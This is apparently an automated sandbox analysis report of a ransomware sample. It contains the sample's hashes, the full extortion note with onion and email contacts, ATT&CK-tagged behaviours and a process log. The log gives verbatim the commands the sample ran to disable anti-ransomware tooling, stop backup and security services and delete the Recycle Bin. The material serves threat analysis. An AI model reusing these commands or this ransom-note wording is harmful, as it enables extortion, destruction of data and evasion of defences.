52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3

Analysis

max time kernel
75s
max time network
136s
platform
windows10_x64
resource
win10-en
submitted
06-09-2021 07:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Size

254KB
MD5

d70181d031e35f86d26be56d230b7d4e
SHA1

27ad13e49541f0f9806a21ea825aab95fba11608
SHA256

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3
SHA512

ad97d1a955f864751ac7243c54d3c611507f7c541aa4a9761ff7b587545a3aee0d23faa24ecd983f71458b9307197cf062181dd51503cc05a6a3f741162cfb2e

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. !!!!!!!!! We backed up all your documents and databases. IF YOU NOT START DIALOGUE WITH US, WE WILL POST ALL YOUR DOCUMENTS AND DATABASES ON INTERNET. !!!!!!!!! We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files. * Please note that files must not contain any valuable information. Do you really want to restore your files? 1) Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open website: http://sonarmsniko2lvfu.onion/?a=reg c) Register account d) Click Compose and write to us, our username: Prometheus, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file 2) Using a email Write to 3 emails address at once, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file : [email protected] [email protected] [email protected] We recommend using 1 method via TOR browser to contact us. Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1. * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. * For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data! Key Identifier: B05QAvu1NNvtlfESrIbTPLrH6GWkNyu6xYJmqmAkH0h6BLPT92MyHMpMNZcGnYRYMRYQOQVKhYfyoi9ZO1LimnBnNkMynuO7Z1/WE9MDeMTLicjdjnFXRCV2F/lH0RJWYyGgNNHI099IM+rDsqpcmUbSUloKwf75oTSNawiPOXAgHODs/oSUs5EtBL5Bts9YS1wLFFjZdetEciUyfWwPGpcvMIjcJsNbdX7shk60AnNC9IJ+69c2kL173+M2EbpBpvAtbjaMVhHVs67K1iqYKZjy9EZv1wYzUJJ/yMf2g7c1d4Wnzj65EZnXXMlFQRAqNSi+AjP4+DLt2+Pdj8FdyTlKkkQhszzKFHASFI+55NHImyPqYGIB0n/s66TxcwRowtiQ5Y1fPQNuCKmk2NIHNvYLZ3iHJyTSWuXzE+nSbzJg+akkMR8ant27GCE+wUaOtg+jO/vA5WV2F9b+qKa5eJWe8T2am8SphTANH8rWRNmHnFhXjDc4jErB3xSzU6f4+nGBh7CmYXS+UNeIw7TvI5mdCk+KFWzsVWtUnVp/Nz7oBCB8QGP4XdT4ioZmZR8yAlFLsUTWZdLIWAQWPj2rCzLcoSvlRocaSLkaozZGXpM48XUTibgxRUEwIos3wvxoJT58tC3N+aCefjQp5Ino/W8nk6hiVDhD96Uu5Zyuitc=

Emails

TEST[[email protected]]

[email protected]

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Ransom Note

Emails

TEST[[email protected]]

[email protected]

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Signatures

Blocklisted process makes network request 10 IoCs

Processes:

mshta.exe

flow	pid	process
14	4416	mshta.exe
15	4416	mshta.exe
17	4416	mshta.exe
18	4416	mshta.exe
20	4416	mshta.exe
22	4416	mshta.exe
24	4416	mshta.exe
26	4416	mshta.exe
29	4416	mshta.exe
31	4416	mshta.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\n\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n\r\nYou are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.\r\nOnly we can give you this key and only we can recover your files.\r\n\r\n!!!!!!!!! We backed up all your documents and databases.\r\nIF YOU NOT START DIALOGUE WITH US, WE WILL POST ALL YOUR DOCUMENTS AND DATABASES ON INTERNET. !!!!!!!!!\r\n\r\nWe recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.\r\n* Please note that files must not contain any valuable information.\r\n\r\nDo you really want to restore your files?\r\n\r\n1) Using a TOR browser!\r\na) Download and install TOR browser from this site: https://torproject.org/\r\nb) Open website: http://sonarmsniko2lvfu.onion/?a=reg\r\nc) Register account\u00a0\r\nd) Click Compose\u00a0 and write to us, our username: Prometheus, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file\r\n\r\n2) Using a email\r\nWrite to 3 emails address at once, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]])\u00a0and link to 3 encrypted files in https://privatlab.com/file :\r\[email protected]\r\[email protected]\r\[email protected]\r\n\r\nWe recommend using 1 method via TOR browser to contact us.\r\nEmail letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.\r\n\r\n* Do not rename encrypted files.\r\n* Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\n* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\r\n* For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!"	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

Drops file in Windows directory 22 IoCs

Processes:

netsh.exenetsh.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4088 taskkill.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4016 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

13980 PING.EXE

pid	process
4088	taskkill.exe

pid	process
4016	reg.exe

pid	process
13980	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

pid	process
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exenet.exe

description	pid	process
Token: SeDebugPrivilege	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Token: SeDebugPrivilege	4088	net.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

pid	process
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

pid	process
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exenet.exenet.exenet.exe

description	pid	process	target process
PID 4700 wrote to memory of 4088	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	taskkill.exe
PID 4700 wrote to memory of 4088	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	taskkill.exe
PID 4700 wrote to memory of 3772	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	reg.exe
PID 4700 wrote to memory of 3772	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	reg.exe
PID 4700 wrote to memory of 4016	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	reg.exe
PID 4700 wrote to memory of 4016	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	reg.exe
PID 4700 wrote to memory of 4452	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4452	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4500	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4500	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 3264	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 3264	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4552	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4552	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4464	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4464	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 3792	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 3792	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4584	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4584	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4652	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4652	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 4680	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4680	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4648	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	cmd.exe
PID 4700 wrote to memory of 4648	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	cmd.exe
PID 4700 wrote to memory of 224	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	netsh.exe
PID 4700 wrote to memory of 224	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	netsh.exe
PID 4700 wrote to memory of 3100	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	netsh.exe
PID 4700 wrote to memory of 3100	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	netsh.exe
PID 4700 wrote to memory of 1352	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 1352	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	sc.exe
PID 4700 wrote to memory of 404	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 404	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1324	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1324	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1512	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1512	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1848	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1848	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2076	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2076	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2364	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2364	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2600	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2600	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2716	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 2716	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 3824	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 3824	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 404 wrote to memory of 3244	404	net.exe	net1.exe
PID 404 wrote to memory of 3244	404	net.exe	net1.exe
PID 4700 wrote to memory of 4280	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4280	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1168	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1168	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 1324 wrote to memory of 4616	1324	net.exe	net1.exe
PID 1324 wrote to memory of 4616	1324	net.exe	net1.exe
PID 1512 wrote to memory of 2192	1512	net.exe	net1.exe
PID 1512 wrote to memory of 2192	1512	net.exe	net1.exe
PID 4700 wrote to memory of 4972	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 4972	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1672	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe
PID 4700 wrote to memory of 1672	4700	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe	net.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\n\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n\r\nYou are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.\r\nOnly we can give you this key and only we can recover your files.\r\n\r\n!!!!!!!!! We backed up all your documents and databases.\r\nIF YOU NOT START DIALOGUE WITH US, WE WILL POST ALL YOUR DOCUMENTS AND DATABASES ON INTERNET. !!!!!!!!!\r\n\r\nWe recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.\r\n* Please note that files must not contain any valuable information.\r\n\r\nDo you really want to restore your files?\r\n\r\n1) Using a TOR browser!\r\na) Download and install TOR browser from this site: https://torproject.org/\r\nb) Open website: http://sonarmsniko2lvfu.onion/?a=reg\r\nc) Register account\u00a0\r\nd) Click Compose\u00a0 and write to us, our username: Prometheus, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file\r\n\r\n2) Using a email\r\nWrite to 3 emails address at once, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]])\u00a0and link to 3 encrypted files in https://privatlab.com/file :\r\[email protected]\r\[email protected]\r\[email protected]\r\n\r\nWe recommend using 1 method via TOR browser to contact us.\r\nEmail letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.\r\n\r\n* Do not rename encrypted files.\r\n* Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\n* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\r\n* For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!"	52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe

C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
"C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:4088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:11512
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3772
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:4016
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:11520
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:11504
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3264
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:4552
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
